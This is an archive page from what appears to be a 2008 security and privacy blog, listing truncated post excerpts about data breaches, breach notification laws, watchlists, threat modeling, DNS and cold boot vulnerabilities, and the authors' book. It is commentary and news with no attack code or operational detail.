File this under “Posts I Wish I’d Written”. Amrit Williams’ “ The 7 Greatest Ideas in Security,” really highlights a lot of my basic thoughts on how security should work. His conclusion sums things up cogently, but go read the entire post: Some may argue that something has been forgotten or that the order is […]

 

Lessons for security from "Social Networks"

There are a couple of blog posts that I’ve read lately that link together for me, and I’m still working through the reasons why. I’d love your feedback or thoughts. A blogger by the name of Lhooqtius ov Borg has a long screed on why he doesn’t like the “Social Futilities.” Tyler Cowan has a […]

 
 

TSA Breaks Planes (and a link to infosec)

Aero News Network has a fascinating story, “ANN Special Report: TSA Memo Suggests That Agency ‘Encourages’ Damaging Behavior.” It covers how a TSA goon climbed up a plane using equipment marked “not a handhold,” damaging it and putting the flying public at risk. It continues: While this may be terrifying on a number of levels, […]

 

Diebold/Premier vote dropping

A voting system used in 34 states contains a critical programming error that can cause votes to be dropped while being electronically transferred from memory cards to a central tallying point, the manufacturer acknowledges. The problem was identified after complaints from Ohio elections officials following the March primary there, but the logic error that is […]

 

The Omnivore's Hundred

I find it interesting that security people and foodies are strongly correlated. Or at least are strongly correlated among the ones I know. Very Good Taste has a list of things called The Omnivore’s Hundred, a list of things worth trying, modulo this and that. You mark things you have tried, and mark things you […]

 

Disaster Recovery Drills Aren't Just For IT

The Economist has a short but great overview on crisis management. The article is well worth reading completely, but there is one section that bears highlighting: Be well prepared in advance. Potential members of a crisis management “team” should rehearse how they would manage the impact of an incident. It is a bit like learning […]

 

We're all in it together

Ryan Singel reports at 27B/6: The TSA was keeping the names of people who lost their wallets and needed to fly — even after ascertaining their identity and determining they were not a threat and could board a plane. It stored these names in a shared threat database. Then it decided that it won’t store […]

 

Certifiably Silly

Over at “The Security Practice,” Michael Barrett writes about “Firefox 3.0 and self-signed certificates.” Neither he or I are representing our respective employers. …almost everyone who wants to communicate securely using a browser can afford an SSL certificate from CAs such as GoDaddy, Thawte, etc. The cost of single certificates from these sources can only […]

 

That's an address I haven't used in a very long time.

Well, I got a letter from BNY Mellon, explaining that they lost my data. The most interesting thing about it, I think, is where it was sent, which is to my mom. (Hi Mom!) I had thought that I’d moved all of my financial statements to an address of my own more than a decade […]

 

Watchlist Cleaning Law

Former South African President Nelson Mandela is to be removed from U.S. terrorism watch lists under a bill President Bush signed Tuesday… The bill gives the State Department and the Homeland Security Department the authority to waive restrictions against ANC members. This demonstrates that greater scrutiny must be placed on the decisions about who gets […]

 

Instant Ice Age

Science reports in, “The Year the World Froze Over:” It sounds like the stuff of science fiction, but nearly 13 millennia ago Europe was plunged suddenly into a deep freeze that lasted 1300 years–and the change happened in little more than a year, according to new data. The evidence also suggests that strong winds, not […]

 

Black Hat (Live) Blog: Keynote

Ian Angell from the London School of Economics gave a great keynote on complexity in systems and how the desire to categorize, enumerate, and add technology can break things in interesting ways. An example of his: there’s an increasing desire among politicians and law enforcement to create huge DNA databases for forensic purposes, to aid […]

 

Does this mean we can revise our opinion of Friday the 13th?

According to The Daily Telegraph, the Knights Templar are suing the Vatican for all that money they lost in 1307. (The Telegraph has a companion article here as well.) This adds up to a nice round €100 billion. The Telegraph didn’t say whether that is American billions (thousand million, 109) or English billions (million million, […]

 

Cleared Traveler Data Lost

Verified Identity Pass, Inc., who run the Clear service have lost a laptop containing information of 33,000 customers. According to KPIX in “Laptop Discovery May End SFO Security Scare” the “alleged theft of the unencrypted laptop” lost information including names, addresses, birth dates and some applicants’ driver’s license numbers and passport information, but does not […]

 

SOUPS 2008, summarized

I really appreciate the way that Richard Conlan has in-depth blogged all of the sessions from the 2008 Symposium on Usable Privacy and Security. The descriptions of the talks are really helpful in deciding which papers I want to dig into. More conferences should do this. There’s only one request I’d make: There’s no single […]

 

What do you want to know about SDL Threat Modeling?

Over on my work blog, I asked: I’m working on a paper about “Experiences Threat Modeling at Microsoft” for an academic workshop on security modeling. I have some content that I think is pretty good, but I realize that I don’t know all the questions that readers might have. So, what questions should I try […]

 

Call Centers Will Get More Annoying

There’s an article in “destination CRM,” Who’s Really Calling Your Contact Center? …the identity questions are “based on harder-to-steal information” than public records and credit reports. “This is much closer to the chest than a lot of the public data being used in other authentication systems,” she says, adding that some companies using public data […]

 

London’s New Transit Card

Transport for London is trying to get as many people as possible to use Oyster Cards. They are cheaper — and theoretically easier to use — than traditional tube / bus tickets. However, using one means that TfL has a record of your journeys on the transport system, which is something that not everybody is […]

 

Reproducibility, sharing, and data sensitivity

What made this particular work different was that the packets we captured came through a Tor node. Because of this difference, we took extreme caution in managing these traces and have not and will not plan to share them with other researchers. Response to Tor Study I won’t get into parsing what “have not and […]

 

New FISA Analysis

Vox Libertas, a blogger at the Daily Kos has written an analysis of the new US FISA law in his article, “I think I understand the FISA bill. Do I?” Vox Libertas has taken an approach that I can appreciate. On the one hand, many people are unhappy with the telecom immunity. I’m one of […]

 
 

Breaches & Human Rights in Finland

The European Court of Human Rights has ordered the Finnish government to pay out €34,000 because it failed to protect a citizen’s personal data. One data protection expert said that the case creates a vital link between data security and human rights. The Court made its ruling based on Article 8 of the European Convention […]

 

Off to Belgium

I’m getting ready to leave for the 2008 Privacy Enhancing Technologies Symposium. I love this event, and I’m proud to have been involved since Hannes Federrath kicked it off as a workshop on design issues anonymity and unobservability. I’m also happy that Microsoft has continued to sponsor an award for outstanding research in Privacy Enhancing […]

 

Putting the fun back in threat modeling

I have an article in the latest MSDN magazine, “Reinvigorate your threat modeling process:” My colleague Ellen likes to say that everyone threat models all the time. We all threat model airport security. We all threat model our homes. We think about threats against our assets: our families, our jewelry, and our sentimental and irreplaceable […]

 

Writing a book: The Proposal

To start from the obvious, book publishers are companies, hoping to make money from the books they publish. If you’d like your book to be on this illustrious list, you need an idea for a book that will sell. This post isn’t about how to come up with the idea, it’s about how to sell […]

 

Security & Human Behavior

There’s a huge amount of interesting stuff from a recent workshop on “Security & Human Behavior.” Matt Blaze has audio, and Ross Anderson has text summaries in the comments on his blog post. Also, see Bob Sullivan, “How magic might finally fix your computer”

 

Laptops and border crossings

The New York Times has in an editorial, “The Government and Your Laptop” a plea for Congress to pass a law to ensure that laptops (along with phones, etc.) are not seized at borders without reasonable suspicion. The have the interesting statistic that in a survey by the Association of Corporate Travel Executives, 7 of […]

 

Leveraging Public Data For Competitive Purposes

The Freakonomics blog pretty much says it all: The latest: importgenius.com, the brainchild of brothers Ryan and David Petersen, with Michael Kanko. They exploit customs reporting obligations and Freedom of Information requests to organize and publish — in real-time — the contents of every shipping container entering the United States. From importgenius.com. There’s a neat […]

 

The Recent History of the Future of Cash

Dave Birch has a really interesting post about The future of the future of cash: The report also identifies three key attributes of cash that make it — still — the dominant payment system. Universality, trust and anonymity. I’m curious about the location of anonymity in the customer mindset and I’m going to post some […]

 

Richard Feynman and The Connection Machine

There’s a fascinating article at The Long Now Foundation, “Richard Feynman and The Connection Machine,” by Danny Hillis. It’s a fun look into the interactions of two of the most interesting scientist/engineers of the last 40 years.

 

Massive Coordinated Vendor Patch For DNS

Dan “Doxpara” Kaminsky today released information about a fundamental design flaw in the architecture of DNS which if properly exploited would allow a malicious party to impersonate any website they wanted to. This issue effects every single version of DNS. The flaw primarily effects the DNS server but it can also effect clients as well […]

 

Writing a book: technical tools & collaboration

When Andrew and I started writing The New School, we both lived in Atlanta, only a few miles apart. We regularly met for beer or coffee to review drafts. After I moved to Seattle, our working process changed a lot. I wanted to talk both about the tools we used, and our writing process. We […]

 

Maryland Breach Notices

Case Number Date Received Business Name No. of MD residents Total breach size Information breached How breach occurred 153504 06/09/08 Argosy University name, social security number, addresses Laptop computer stolen from employee of SunGard Higher Education Maryland Information Security Breach Notices are put online by the most-forward looking Douglas F. Gansler, attorney general. I’m glad […]

 

Freakonomics and Data

There’s a really interesting article in the New Republic, “Freaks and Geeks:” In 2000, a Harvard professor named Caroline Hoxby discovered that streams had often formed boundaries to nineteenth-century school districts, so that cities with more streams historically had more school districts, even if some districts had later merged. The discovery allowed Hoxby to show […]

 

On Banking Security

Dave Maynor comments: Blizzard is going to sell a One Time Password device…Isn’t it kind of funny when an online game has better security than most banks? Blizzard Entertainment, Inc. today introduced an optional extra layer of security for World of Warcraft®, its award-winning massively multiplayer online role-playing game. Designed to attach to a keychain, […]

 

Sounds Like — Chomsky

The New Scientist reports that “Charades reveals a universal sentence structure.” Susan Golden-Meadow, a linguistic psychologist at the University of Chicago, led a team that found that speakers of most languages use the same simple sentence structure when miming, regardless of the structure of the language they speak. A demonstration movie is here. That structure […]

 

Study: Firefox patched quickest, IE a laggard

A new technical report out of ETH Zurich, Understanding the Web browser threat, should appeal to EC readers. The authors were granted access to the USER-AGENT information recorded globally by Google between January2007 and June 2008. By examining the first visit per day by each browser, the authors are able to determine which clients were […]

 
 

Network Security Podcast #109, featuring Adam

I’m the guest on the latest episode of Martin McKeay and Rich Mogull’s Network Security podcast. It was a lot of fun to record, I hope you enjoy listening to it. [Link fixed.]

 

Game Theory and Poe

Julie Rehmeyer of Science News writes in, “The Tell-Tale Anecdote: An Edgar Allan Poe story reveals a flaw in game theory” about a paper Kfir Elias and Ariel Rubenstein called, “Edgar Allan Poe’s Riddle: Do Guessers Outperform Misleaders in a Repeated Matching Pennies Game? The paper discusses a game that Poe describes in The Purloined […]

 

Not quite clear on the subject

Slyck News has a story, “SSL Encrpytion Coming to The Pirate Bay” a good summary of which is in the headline. However, may not help, and may hurt. Slyck says: The level of protection offered likely varies on the individual’s geographical location. Since The Pirate Bay isn’t actually situated in Sweden, a user in the […]

 
 

Science isn't about Checklists

Over at Zero in a Bit, Chris Eng has a post, “Art vs. Science“: A client chastised me once for making a statement that penetration testing is a mixture of art and science. He wanted to believe that it was completely scientific and could be distilled down to a checklist type approach. I explained that […]

 

Water on Mars!

Mars Phoenix Tweets: “We Have ICE!” And yes, they really did announce on Twitter and a press release.

 

Medeco Embraces The Locksport Community

Two days ago, Marc Weber Tobias pointed out that Medeco, the 800 pound gorilla in the high-security lock market, recently published an open letter to the locksport community, welcoming it to the physical security industry: While we have worked with many locksmiths and security specialists in the past to improve our cylinders, this is the […]

 

L'affaire Kozinski

Kim Zetter on Threat Level has written about Larry Lessig’s comments about Judge Alex Kozinski’s problems with having files on a personal server made public. Zetter has asked to hear people’s opinions about the issue. I thought I’d just blog about mine. Basically, I agree with Lessig. The major place that I disagree with Lessig […]

 

Can You Hear Me Now?

Debix, Verizon, the ID Theft Research Center and the Department of Justice have all released really interesting reports in the last few days, and what makes them interesting is their data about what’s going wrong in security. This is new. We don’t have equivalents of the National Crime Victimization Surveys for cyberspace. We don’t have […]

 

Paper Breach

The BBC reports in “Secret terror files left on train” that an … unnamed Cabinet Office employee apparently breached strict security rules when he left the papers on the seat of a train. A fellow passenger spotted the envelope containing the files and gave it to the BBC, who handed them to the police. We […]

 

What’s up with the "New and Used" Pricing on Amazon?

So having a book out, you start to notice all sorts of stuff about how Amazon works. (I’ve confirmed this with other first time authors.) One of the things that I just can’t figure out is the pricing people have for The New School. There’s a new copy for 46.43. A mere 54% premium over […]

 

In the "couldn't have happened to a better set of people" department…

Fifteen people have escaped unharmed in the US state of Indiana after a sky-diving plane lost power 7,000ft (2,100m) from the ground. The pilot told the 14 skydivers on board to jump to safety, then crash-landed the plane. And the pilot was un-injured, according to the AP story. From Skydiving plane fails at 7,000ft, BBC. […]

 

8th Pet Symposium Early Registration Deadline

We kindly invite you to attend the next PET Symposium, that will take place in Leuven (Belgium) on July 23-25, 2008. The PET Symposium is the leading international event for the latest research on privacy and anonymity technologies. This year, four other events are co-located with PETS 2008, including the Workshop On Trustworthy Elections (WOTE […]

 

Open thread

What the heck. Let’s see what happens. Comment on what you will.

 

Because it is the weekend and I am lazy

Chris’s beach reading recommendations John Maynard Smith, Evolution and the Theory of Games James S. Coleman, Foundations of Social Theory Ken Binmore, Natural Justice

 

Jonathan Ive's Sharia Style

I was on a business commuter flight the other day, which was also the maiden voyage of my MacBook Air. I had it out before takeoff. This was an international flight and I was in bulkhead. On international flights, they’re not as strict about not having your laptop on your lap during takeoff. This flight […]

 

Does the UK need a breach notice law?

Chris Pounder has an article on the subject: In summary, most of the important features of USA-style, security breach notification law are now embedded into the guiding Principles of the Data Protection Act. Organisations risk being fined if they carelessly loose personal data or fail to encrypt personal data when they should have done. Individuals […]

 

Why the heck don't I ever have ideas this good?

Walkscore.com. Calculates a location’s “walkability” by using Google Maps to figure out how close various amenities (such as grocery stores, public transit, parks, etc.) are. Not a perfect service, but a great idea.

 

Sing it shrdlu

Over at Layer8, shrdlu lays it out there and tells us what it takes to appear to be effective: In all the initiatives I’ve rolled out in my (checkered) career, the ones that have gotten the most acclaim from my management have always been the ones that were most visible to the users. They turned […]

 

New School Reviews

Don Morrill, IT Toolbox: If you want to read a book that will have an influence on your information security career, or if you just want to read something that points out that we do need to do information security differently, then you need to go pick up a copy of “The new school of […]

 

"The Black Hat Tax?" Show me the money

A number of people have sent me links to “Black Hat Tariffs – The Black Hat Taxes on consumer Internet companies are on the rise:” In May 2006, I made mention of the Black Hat Tax, in which most consumer Internet sites have an inherent time, resource, and mindshare tax of roughly 25% due to […]

 

Apparently The State Department Didn’t Learn From Regular Passports

The Washington Times reports that the State Department is going to be producing “passport cards” for people who regular travel by car or boat to/from Canada, Mexico and Carribean. About the size of a credit card, the electronic-passport card displays a photo of the user and a radio frequency identification (RFID) chip containing data about […]

 
 

Let's not ask the experts?

Can Sips at Home Prevent Binges? is a fascinating article in the New York Times. It turns out there’s very solid evidence about this: “The best evidence shows that teaching kids to drink responsibly is better than shutting them off entirely from it,” he told me. “You want to introduce your kids to it, and […]

 

Uncle Harold and Open Source

Uncle Harold (not his real name, not our real relationship, and I never even called him “Uncle”) was a cool guy who always fixed his own cars. Most of my life, Uncle Harold has been complaining. It used to be you could actually fix a car. You could put things in, take them out, adjust […]

 

6/16ths of Chileans personal information leaked by hacker

A hacker in Chile calling himself the ‘Anonymous Coward’ published confidential data belonging to six million people on the internet. Authorities are investigating the theft of the leaked data, which includes identity card numbers, addresses, telephone numbers, emails and academic records. Chile has a population of about 16 million, so that’s 3/8ths of the country. […]

 

UK Information Commissioner's Office Can Now Fine Your Ass

From the article: The Criminal Justice and Immigration Act has received Royal Assent creating tough new sanctions for the privacy watchdog, the Information Commissioner’s Office (ICO). This new legislation gives the ICO the power to impose substantial fines on organisations that deliberately or recklessly commit serious breaches of the Data Protection Act. It’s about time […]

 

Call me crazy?

There’s an article in the New York Times, “‘Mad Pride’ Fights a Stigma” “It used to be you were labeled with your diagnosis and that was it; you were marginalized,” said Molly Sprengelmeyer, an organizer for the Asheville Radical Mental Health Collective, a mad pride group in North Carolina. “If people found out, it was […]

 

Credit Bureaus and Outsourcing

The “I’ve Been Mugged” blog has a great three part series on outsourcing by credit bureaus: “Is It Wise For Credit Bureaus To Outsource To Foreign Call Center Firms? (Part 1),” “part 2” and “part 3.” He digs deep into how extensively TransUnion outsources, and where. I went looking, and was surprised to see that […]

 

A question of ethics

Various estimates have been made regarding the quantity of personal identifying information which has been exposed by various mechanisms. Obviously, though, we only know about what we can see, so seeing more would make such estimates better. One way to see more would be to look in more places, for example on peer-to-peer file sharing […]

 

Fasilyce, upon Reading

Dear Mr. Banks, Much as I enjoy your work, it is entirely dis-congruous to your readers to insert words known to neither the Oxford English Dictionary or the internet (as indexed here, here or here) whose meanings are not rapidly comprehensible. Thank you for your future attention to this matter. I remain, etc, etc.

 

Italy Posts Tax Return Data on Official Website

How much do you make? How surprised would you be to learn that your magic number had been posted on the Internet by the government? And that it was not by mistake, as in other recent breaches of privacy. How Much Do You Make? The Nation Already Knows. The data has already been removed from […]

 

Everybody Run, Crispin's Got a Blog

My buddy, collaborator and co-worker Crispin Cowan has started a blog. The first post is “Security Is Simple: Only Use Perfect Software.” [Update: Added a link to Crispin’s home page, because some readers apparently have trouble with a search engine.]

 

Quantum Uncertainty

Technology Review has a pair of articles on D-Wave‘s adiabatic quantum computer. Quantum pioneer Seth Lloyd writes in “Riding D-Wave” about quantum computing in general, adiabatic quantum computing, and D-Wave’s efforts to show that they’ve actually built a quantum computer. Linked to that is Scott Aaronson’s article, “Desultory D-Wave,” in which Lloyd’s nail-biting is made […]

 

The messenger is the message

In a blog post entitled “Lending Tree A Little Late In Cutting Off Network Access?“, I read that in the recent Lending Tree breach: several former employees may have helped a handful of mortgage lenders gain access to Lending Tree’s customer information by sharing confidential passwords with the lenders. Later, the author describes “an obvious […]

 

Who Watches the Watchlists?

The idea of “watchlists” has proliferated as part of the War on Terror. There are now more than 63 of them: As part of its regular “risk management” service, which provides screening, tracing, and identity and background checks on potential clients or trading partners, MicroBilt will now offer a “watch list” service that checks these […]

 

5754463f

The ACM has a list of classic computer science works put together based on responses to a survey of the membership. I’m no computer scientist (though I’ve lived with my share…) but I’m shocked that none of Knuth’s works is on this list, even if it is basically a beauty contest.

 

Security Metric?

Ross Anderson has made PDF versions of several chapters of his Security Engineering (second edition) available on-line. The entire first edition has been available for some time. I am sure this second edition will be outstanding. I would rank the first edition as one of the top three technical books I’ve read. It would likely […]

 

Good problems to have

You don’t have much credibility looking for a publisher for a book on rum when you’re sailing in the Caribbean drinking the best rums you can find in the name of research. Most people just didn’t take me seriously that there was even a need for a book on rum. It took quite a while […]

 

University of Miami: Good for the body, bad for the soul?

The University of Miami has chosen to notify 41,000 out of 2.1 million patients whose personal information was exposed when thieves stole backup tapes. The other 2.1 million people, apparently, should be reassured, that their personal medical data was stolen, but the University feels it would be hard to read, and well, there’s no financial […]

 

Point Break, Live

The starring role of Johnny Utah is selected from the audience each night, and reads their entire script off of cue-cards. This method manages to capture the rawness of a Keanu Reeves performance even from those who generally think themselves incapable of acting. The fun starts immediately with the “screen test” wherein the volunteer Keanus […]

 

Marty Lederman, on a roll

You see, the CIA apparently uses the less dangerous version of “waterboarding” — not the Spanish Inquisition method, but the technqiue popularized by the French in Algeria, and by the Khmer Rouge — involving the placing of a cloth or plastic wrap over or in the person’s mouth, and pouring or dripping water onto the […]

 

Microsoft Security Intelligence Report V4

Microsoft Security Intelligence Report (July – December 2007) This volume of the SIR focuses on the second half of the 2007 calendar year (from July through December) and builds upon the data published in the previously released volumes of the SIR. Using data derived from several hundred million Windows users, and some of the busiest […]

 

Quantum Cryptography Broken and Fixed

Researchers at Linköping University in Sweden have found flaws in quantum cryptography. They also supply a fix. The announcement is here; a FAQ is here; full paper is at the IEEE here (but requires an IEEE membership). The announcement says: Jan-Åke Larsson, associate professor of applied mathematics at Linköping University, working with his student Jörgen […]

 

WEIS 2008: Register now

Registration is under way for the seventh Workshop on the Economics of Information Security , hosted by the Center for Digital Strategies at Dartmouth’s Tuck School of Business June 25-28, 2008 The call for papers, and archives of past workshops give a good sense of what you’ll find (and it is awesome and well worth […]

 

Edward Lorenz, 1917-2008

Edward Lorenz, most famous for research concerning the sensitivity of high-level outcomes to seemingly insubstantial variations in initial conditions (the so-called “butterfly effect“), died April 16 in Cambridge, Massachusetts. Much more information concerning Lorenz’s life and work is available via Wikipedia.

 

Congratulations to the CVE team!

The CVE Web site now contains 30,000 unique information security issues with publicly known names. CVE, which began in 1999 with just 321 common names on the CVE List, is considered the international standard for public software vulnerability names. Information security professionals and product vendors from around the world use CVE Identifiers (CVE-IDs) as a […]

 

Center for Innovative Financial Technology Launches at Berkeley

Congratulations to Berkeley on setting up a “Center for Innovative Financial Technology“, but I wonder why their mission is so conservative? The mission of the Center is to conduct and facilitate innovative research and teaching on how new technologies impact global electronic markets, investment strategies, and the stability of the financial system. The information people […]

 

Virginia gets it

[…]an individual or entity that owns or licenses computerized data that includes personal information shall disclose any breach of the security of the system following discovery or notification of the breach of the security of the system to the Office of the Attorney General and any affected resident of the Commonwealth without unreasonable delay. Virginia’s […]

 

Bot construction kit for non-programmers

We all know that ID theft and extortion bots are ubiquitous. Perhaps it is some consolation that a modicum of technical skill is needed to construct such things. That has changed. I (a complete non-programmer) have just built not one but two “bots” using materials available here and here! With these templates, any 8 year-old […]

 

Privacy Act and "actual damages"

Lauren Gelman writes: I’m breaking blog silence to report on an amazing decision out of the DC Circuit holding that the federal Privacy Act’s requirement that Plaintiffs show actual damages does not require pecuniary harm but can be met by a showing of emotional distress. Am. Fed’n of Gov’t Employees v. Hawley, D.D.C., No. 07-00855, […]

 

Attrition ends Dataloss — NOT!

UPDATE: This was a belated April Fools’ from the Attrition people, which clearly suckered me in. Attrition.org’s Lyger has announced the end of Attrition’s Dataloss project (presumably including both the DLDOS and Dataloss mailing list). In the past few weeks, it has come to our attention that too many people are more concerned with making […]

 
 

41 and counting

Virginia, West Virginia, and South Carolina are the latest states to pass data breach notification laws, bringing to 42 the total number of states with such laws on the books (including the one state with a law that applies only to public entities, Oklahoma) See More Breach Notification Laws — 42 States and Counting at […]

 

RSA Crazy Busy, book notes

I’m sorry blogging has been light, but RSA has been really busy. I did want to post a quick reminder, I’ll be doing a book singing at 2.30 at the RSA bookstore. PS: I know, that should really say “signing,” not “singing” but I decided I like the typo. If enough people show up and […]

 

Amazon and The New School

Several of you have mailed or commented about the New School being “delayed” from Amazon. I apologize, this was a surprise to me. What our publisher says: Because of their set-up, Amazon has been taking longer to get a book available for shipping. As you can see this causes problems when they list the pub […]

 

New School of Information Security: book signing at RSA

I’ll be at RSA next week, and have a book signing scheduled for 2:30 PM Wednesday (April 9) at the RSA bookstore. To be more clear: The RSA bookstore will have copies for sale. I know many of you are waiting for copies. Many of our reviewers emailed me in the last day or two […]

 

The FDIC's Cyber Fraud Report

The FDIC’s Division of Supervision and Consumer Protection didn’t release a report titled “Cyber Fraud and Financial Crime” on November 9, 2007. That release was left to Brian Krebs, a reporter with the Washington Post, in early March, who blogged about it in “Banks: Losses From Computer Intrusions Up in 2007” and “The FDIC Computer […]

 

94% of Philippine IT Professionals Endorse Breach Disclosure

“LOCAL SURVEY SHOWS: Private sector wants breach of information systems reported :” MANILA, Philippines — Local organizations want the breach of information systems and theft of personal information reported, a survey conducted by the Cyberspace Policy Center for Asia Pacific (CPCAP) showed. “A surprising 94 percent favored the imposition by law of [an] obligation upon […]

 

I see you stand like greyhounds in the slips…

…straining upon the start. The game’s afoot! Follow your spirit; and upon this charge Cry ‘God for Harry, England, and Saint George!’ So closes the speech before battle which Shakespeare wrote for Henry V. You know, the one which opens, ““Once more into the breach:” (Thoughts on the cumulative effects of notification letters).” I seem […]

 

Black Hat Speaker Selection

Black Hat USA News: We’re very proud to announce a new feature for paid Black Hat attendees starting with the USA show in August – delegate access to our CFP system! Paid delegates can now log into our CFP database, read and review our proposed presentations and share their ratings and comments with Black Hat. […]

 

Dan Solove's books free and online

Dan Solove has put his two current books, “The Future of Reputation” and “The Digital Person” online for free. I’ve felt bad in not reviewing The Future of Reputation, because I really enjoyed it, and have been trying to figure out what to say. Solove does a great job of surveying reputation in its many […]

 

Saving the Taxpayers Money

The Washington Times reports, “Outsourced passports netting govt. profits, risking national security.” It is the first of a three-parter. Interesting comments: The United States has outsourced the manufacturing of its electronic passports to overseas companies — including one in Thailand that was victimized by Chinese espionage — raising concerns that cost savings are being put […]

 

Science in Action

The New Scientist reports in, “Have peacock tails lost their sexual allure?” A controversial study has found no evidence for the traditional view – practically enshrined in evolutionary lore – that peahens choose their partners depending on the quality of the peacocks’ tails. Obviously, traditionalists have many things to say about the quality of the […]

 
 

On the Frequency of Fake bin Laden Messages

I’ve noticed that every time there’s a new message from Osama bin Laden, the press very carefully calls into question its authenticity. For example, CNN’s article “Purported bin Laden message: Iraq is ‘perfect base’” opens: Al-Jazeera broadcast on Thursday an audiotape on which a voice identified as Osama bin Laden declares “Iraq is the perfect […]

 

Algorithms for the War on the Unexpected

Technology Review has an article, “The Technology That Toppled Eliot Spitzer.” What jumped out at me was the explicit statement that strange is bad, scary and in need of investigation. Bruce Schneier is talking a lot about the war on the unexpected, and this fits right into that. Each category is analyzed to determine patterns […]

 

Context, please!

Chess masters will sometimes play chess against a dozen or more competitors at once, walking from board to board and making a move. The way they do this isn’t to remember the games, but to look at the board, and make a decent (to a master) move each time. They look at the board, get […]

 

Hannaford: 4.2 million card #s potentially exposed

Hannaford says the security breach affects all of its 165 stores in the Northeast, 106 Sweetbay stores in Florida and a smaller number of independent groceries that sell Hannaford products. The company puts the number of unique credit and debit card numbers that were potentially exposed to fraud at 4.2 million. The company is currently […]

 

Bear Stearns

Dan Geer is fond of saying that financial risk management works because everyone knows who owns what risks. Reports are that JPMorgan just bought Bear Stearns for $236MM, a 93% discount to Friday’s closing price, with $30BB of US taxpayer money thrown in (as guarantees) for good measure. Bloomberg also reports that the Bear Stearns […]

 

Liechtenstein Über Alles?

The New York Times had a story, “Tax Inquiry? Principality Is Offended:” After weathering days of criticism from Germany over a spectacular tax evasion case, Liechtenstein — sometimes seen as the inspiration for the satirical novel from the 1950s about a tiny Alpine principality that declared war on the United States — is digging in […]

 

Speaking of Privacy….

I was dismayed to learn that footage of Spitzer’s (alleged) rent-a-babe “Kristin” performing in a class play while in elementary school has been featured at various web sites — among them serious sites that should know better. One could argue that this woman made her bed, and now she can lie in it (puns intended). […]

 

Banks, Privacy and Revenge

Eliot Spitzer made a name for himself attacking banks. Setting aside the legitimacy of those attacks, I find it shocking that he didn’t realize how much banks know about each one of us. It’s doubly shocking that he didn’t expect revenge. The New York Times claimed that the “Revelations Began in [a] Routine Tax Inquiry.” […]

 

More Hardware Security Shown to be Bunk

After showing that “encrypted” disk drives only encrypted the password you use, not the data, Heise-Online now shows that fingerprint-access is often bunk: Manufacturers of USB sticks and cards with fingerprint readers promise us that their data safes can only be opened with the right fingerprint. It turns out that an easy-to-find tool allows nosy […]

 

Thank you, Usenix!

I’m delighted to report that USENIX, probably the most important technical society at which I publish (and on whose board I serve), has taken a long-overdue lead toward openly disseminating scientific research. Effective immediately, all USENIX proceedings and papers will be freely available on the USENIX web site as soon as they are published. (Previously, […]

 
 

Dan Geer: Economics and Strategies of Data Security

Speaking of books: This book explores the dramatic shift from infrastructure protection to information protection, explaining why data security is critical to business today. It describes how implementing successful data security solutions across sophisticated global organizations requires a new data-centric, risk based and strategic approach, and defines the concepts and economics of a sound data […]

 

Belva's got a brand new blog

Ken Belva has a new blog at http://www.bloginfosec.com/. Looks like it is more “formal” and magazine-like than the typical blog, which many people will appreciate. There seems to be a pretty solid collection of contributors, and the hunt is on for additional qualified writers. There’s even a raffle for an iPod (but I already have […]

 

WOOT08 Call for Papers

Progress in the field of computer security is driven by a symbiotic relationship between our understandings of attack and of defense. The USENIX Workshop on Offensive Technologies aims to bring together researchers and practitioners in system security to present research advancing the understanding of attacks on operating systems, networks, and applications. 2nd USENIX Workshop on […]

 

You Can't Say That: Blogging Your Failures

I forgot exactly where I saw the link to Ben Neumann’s Views from the Trenches, but the opening lines of his post “Network Outage” are great, doubly for what he’s just gone through: Today was a NIGHTMARE-DAY! Globat.com just emerged from a major outage – the worst in company history and everybody – customers and […]

 

Friday Pogues Blogging

I saw the Pogues’ show at Chicago’s Riviera Theatre last night, exactly 22 years minus one day since the last time I saw them. Spider Stacy seems to have fared a tad better than Shane :^). The show was good, but of course nothing can compare to nostalgia. A particularly enjoyable feature for me was […]

 

Analyzing the Analysts

In Things Are Looking Up For TJX, or, Javelin Research – Credibility Issues?, Alex takes a look at research released by Javelin, and compares it to some SEC filings. Javelin is making the argument that companies that suffer massive breaches will lose market share. As do these folks at Response Source: “LATEST NATIONAL RESEARCH REVEALS […]

 

I've Made Up My Mind, Don't Bother Me With the Facts

The report, Educational Security Incidents (ESI) Year in Review, spotlights institutions worldwide, and Penn State was included in the report with one data breach last year. … “My goal with ESI is to, hopefully, increase awareness within higher education that not only is information security a concern, but that the threats to college and university […]

 

The real problem in ID theft

In “Reckoning day for ChoicePoint, “Rich Stiennon writes: The real culprit is actually ChoicePoint itself and the three bureaus. By creating what is supposedly a superior solution than the old fashioned way of granting credit (knowing your customer, personal references, bank references, like they do it in most of the rest of the world) they […]

 

US Banks Rated for Identity Theft

Chris Hoofnagle has completed a paper which ranks US financial institutions according to their relative incidence of ID theft, based on reports to the FTC by consumers who named an institution. Chris (like another Chris I know) would like to see more complete information on ID theft available to consumers, so they can make informed […]

 

Threat Modeling Blog Series

Over on my work blog, I just wrapped up a series on threat modeling. Because blogs display the content backwards, I’ve put the entire series up as a Word doc: The Trouble With Threat Modeling. [Update: If you want to see all the threat modeling posts, they’re at Threat Modeling SDL blog posts. They’re displayed […]

 
 

More airport security toys

“Let’s play ‘airport security’,” says Foriegn Policy. It’s like playing Doctor, only with latex gloves and inappropriate touching. In an effort to help children understand and be comfortable and confident in the need and process of higher security protocols we’ve developed a new play and learning toy and resource web site to promote and educate […]

 

Dubai banks hiring hackers (no word on if a drug test is needed)

Dubai, as Adam pointed out, is in something of a branding quandary. A hard line – some would say a retrograde and counterproductive line – on victimless crime doesn’t mix well with an image as a fun spot for the well-heeled. Meanwhile, there’s this (from Emirates Business 24-7, retrieved 2/21/2008): Dubai-based banks are recruiting former […]

 

Time To Rethink The Efficacy Of That Hard Drive Crypto

As we love to say, if you have physical access to a machine, then you have access to all the data on it. Today Ed Felten et al. proved that yet again when they released a paper describing cold boot attacks on encryption keys. In it, they DRAM can be stripped (even after a full […]

 

Back in the ring to take another swing

Via Kable’s Government Computing, comes news that the British House of Lords “Science and Technology Committee has announced a follow-up inquiry to its ‘Personal Internet Security’ report”. Chair of the committee Lord Sutherland said: “The committee was disappointed with the government’s response to its report. We felt they had failed to address some of our […]

 

Here we go…

Experian sues Lifelock. I think I can hear the champagne corks popping at ID Analytics from here. They, arguably, provide a service which is similar enough (a detective control against new account fraud, rather than a preventative control), but theirs operates through a different mechanism. I’d like to see some numbers showing the efficacy of […]

 

A++++ Fast and Professional!! Would Read Again!

